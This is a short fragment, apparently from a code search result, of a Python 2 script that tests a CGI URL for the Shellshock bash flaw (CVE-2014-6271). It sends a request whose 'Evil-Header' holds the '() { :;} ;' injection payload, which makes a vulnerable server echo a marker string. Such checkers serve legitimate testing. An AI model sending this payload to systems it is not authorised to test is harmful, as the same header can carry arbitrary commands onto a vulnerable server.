Detected 2 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}': uthful and good... than to not." # import sys import urllib2 if len(sys.argv) < 2 or not sys.argv[1].startswith("http"): print "Example: %s http://localhost/cgi-bin/test.cgi" % sys.argv[0] sys.exit(0) url = sys.argv[1] vstring = "CVE-2014-6271 Vulnerable" req = urllib2.Request(url) req.add_header('Evil-Header', '() { :;} ; echo "Content-Type: text/html" && echo && echo "%s" && exit' […]
↧